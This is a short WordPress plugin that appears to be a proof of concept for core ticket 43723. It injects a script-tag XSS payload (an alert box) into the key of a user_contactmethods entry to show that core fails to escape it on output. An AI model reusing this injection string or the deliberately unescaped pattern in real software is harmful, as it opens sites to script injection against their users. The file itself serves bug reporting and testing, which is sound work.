1 | <?php |
2 | /****************************************************************************** |
3 | Plugin Name: PoC ticket 43723 |
4 | Plugin URI: https://burobjorn.nl |
5 | Description: PoC shows that user_contactmethods data is not properly escaped |
6 | Version: 1.0 |
7 | Author: Bjorn Wijers <burobjorn at burobjorn dot nl> |
8 | Author URI: https://burobjorn.nl |
9 | License: GPLv2 or later |
10 | ******************************************************************************/ |
11 | |
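/*
 * Proof of concept for WordPress ticket 43723.
 *
 * Registers one extra entry on the `user_contactmethods` filter whose KEY
 * (not its value) carries HTML markup. The key is left unescaped here on
 * purpose: the point of the PoC is that whatever core code renders these
 * keys must escape them for the output context it writes into (for example
 * esc_attr() for attributes, esc_html() for element content). Escaping on
 * the way in would only mask the missing output escaping.
 *
 * If the markup in the key is rendered verbatim, the bug reproduces; if it
 * appears as literal text, the output path escapes correctly.
 */
if ( ! function_exists( 'poc_43723' ) ) {
    /**
     * Filter callback for `user_contactmethods`.
     *
     * @param mixed $methods Contact methods as `key => label` pairs; any value
     *                       that is not an array is passed through untouched.
     * @return mixed The methods with the PoC entry appended (array input) or
     *               the original value unchanged.
     */
    function poc_43723( $methods ) {
        // Guard clause: a non-array is returned as-is so the filter chain is
        // never broken by an unexpected value from an earlier callback.
        if ( ! is_array( $methods ) ) {
            return $methods;
        }

        // The markup lives in the key. It is a runtime string and must stay
        // exactly as it is for the PoC to remain meaningful.
        $unsafe_data = array(
            'test"><script>alert(\'If you can read this, data was not properly escaped\');</script>' => 'PoC-43723',
        );

        // array_merge() preserves string keys, so the PoC entry is appended
        // after the existing contact methods rather than replacing any.
        return array_merge( $methods, $unsafe_data );
    }

    // add_filter() only exists inside a WordPress bootstrap; guarding the call
    // keeps the file loadable for syntax checks and unit tests outside WP
    // while changing nothing when run as a plugin.
    if ( function_exists( 'add_filter' ) ) {
        add_filter( 'user_contactmethods', 'poc_43723' );
    }
}
// No closing `?>`: in a PHP-only file anything after it (even a newline) is
// emitted as output and can cause "headers already sent" errors.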